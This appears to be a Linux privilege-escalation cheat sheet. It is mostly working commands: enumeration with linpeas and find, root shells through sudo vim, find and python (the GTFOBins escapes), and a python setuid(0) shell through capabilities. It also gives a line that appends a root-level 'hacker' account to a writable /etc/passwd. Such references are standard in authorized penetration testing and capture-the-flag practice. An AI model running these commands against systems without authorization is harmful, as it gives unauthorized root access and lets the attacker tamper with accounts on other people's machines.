Linux Privilege Escalation

Enumeration

Run linpeas first for a broad sweep, then manually verify the interesting findings: automated tools flag a lot of noise.

./linpeas.sh | tee linpeas.out

whoami; id; hostname; uname -a
cat /etc/passwd | grep -v nologin
cat /etc/crontab
sudo -l
find / -perm -4000 -type f 2>/dev/null
find / -writable -type f 2>/dev/null | grep -v proc
getcap -r / 2>/dev/null

Sudo Abuse

sudo -l shows what commands you can run as root: check every result on GTFOBins for a known escape.

sudo -l
# GTFOBins: https://gtfobins.github.io
sudo vim → :!bash
sudo find . -exec /bin/bash \;
sudo python -c 'import os; os.system("/bin/bash")'

SUID Abuse

SUID binaries run as their owner regardless of who executes them: anything non-standard owned by root is worth checking on GTFOBins.

find / -perm -4000 -type f 2>/dev/null
# Check each on GTFOBins

Cron Jobs

Look for cron jobs running as root that call scripts you can write to: rewrite the script, wait for the next execution.

cat /etc/crontab
ls -la /etc/cron*
# Look for writable scripts called by root

Writable /etc/passwd

If /etc/passwd is world-writable, you can add a new root-level user with a known password hash.

openssl passwd -1 -salt salt password
echo 'hacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd

Capabilities

Capabilities grant specific root-level privileges to binaries without full SUID: cap_setuid+ep on an interpreter is effectively root.

getcap -r / 2>/dev/null
# python3 cap_setuid+ep → python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

​Enumeration

​Sudo Abuse

​SUID Abuse

​Cron Jobs

​Writable /etc/passwd

​Capabilities